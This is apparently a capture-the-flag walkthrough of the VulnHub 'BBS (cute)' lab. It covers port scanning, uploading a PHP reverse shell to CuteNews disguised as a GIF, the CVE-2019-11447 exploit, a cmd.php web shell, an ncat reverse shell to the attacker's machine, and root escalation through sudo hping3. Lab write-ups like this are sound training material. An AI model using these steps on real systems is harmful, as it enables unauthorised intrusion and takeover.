https://www.vulnhub.com/entry/bbs-cute-102,567/
Fix VM network
- Debian 10, network is broken in QEMU
- launch VM, edit GRUB parameters of line
linux ...
, changero
torw
, and addinit=/bin/bash
after it to by pass login - edit
/etc/network/interfaces
, change interface name to ours, addauto enp1s0
Discover Target IP
sudo nmap -sn 192.168.122.1-255
Scan Ports
- `nmap -p- 192.168.122.122
nmap -p 22,80,88,110,995 -sC -sV 192.168.122.122
Port 80
- This site doesn’t have a
robots.txt
- run
dirb http://192.168.122.122
and found 83 results
CuteNews
- go to the
http://192.168.122.122/index.php
that we found - we can’t login, but we can try to register a new account.
- it requires a CAPtCHA, if we view source code of the register page at
view-source:http://192.168.122.122/index.php?register
we can findhttp://192.168.122.122/captcha.php
with the captcha - once we created a account and logged in, we can try to change our information in the Personal Options page
- it has an option for us to upload a avatar picture, so we can try to upload a reverse shell script
PHP Reverse Shell
- get a copy of php reverse shell script to our current directory by
cp /usr/share/webshells/php/php-reverse-shell.php .
- edit and change IP and port to attacker’s
- because this website will check for the file metadata, we can try to disguise it by adding
GIF8;
to the beginning of the file, now the system will think it is a GIF image file. - after uploaded the image, save change, open a listening port on the attacker’s machine
ncat -nvlp 7373
- go back to the General options page, right click, open in new tab of the “image” that we just uploaded, it will bring us to
https://cute.calipendula/uploads/avatar_led_php-reverse-shell.php
, it won’t work as this domain doesn’t exist, we can modify our/etc/hosts
file on attacker’s machine, or just changecute.calipendula
to our target’s IP address, Now we have a shell
CVE 2019-11447
- because it is using CuteNews 2.1.2, we can use a Remote Code Execution exploit https://www.exploit-db.com/exploits/48800
- we need to change the path of the Python script, by removing all the
/CuteNews
filepath name, as we don’t have in our target’s website. if using Vim:%s@/CuteNews@@
- run it and enter our target’s IP address, it will automatically create a user and give us prompt where we can input commands
- start a revese shell from here using
ncat 192.168.122.101 4444 -e /bin/bash -i
By file upload
- so put this into a
cmd.php
file, upload it using the same method of uploading avatar as [above](#### PHP Reverse Shell) - open the “image” in browser, change the domain to target’s IP, add
?cmd=
and put whatever command after ithttp://192.168.122.122/uploads/avatar_led_cmd.php?cmd=whoami
- start a revese shell from here using
ncat 192.168.122.101 4444 -e /bin/bash -i
Privilege Esculation
- spawn a better shell with Python
python3 -c 'import pty;pty.spawn("/bin/bash")'
- if we run
id
can seewww-data
is definitely not in thesudo
group - but we can still run
sudo -l
to see the sudoers file
User www-data may run the following commands on cute:
(root) NOPASSWD: /usr/sbin/hping3 --icmp
- it shows that
hping3
will run asroot
- if still not sure we can try
linpeas.sh
too - go to https://gtfobins.github.io/gtfobins/hping3/, it shows that it maintain its privileges.
- running
whoami
insidehping3
will show that we are root - we can try running bash with the same privilege by
bash -p
, now we are in a root shell
Capture the flags
cat root.txt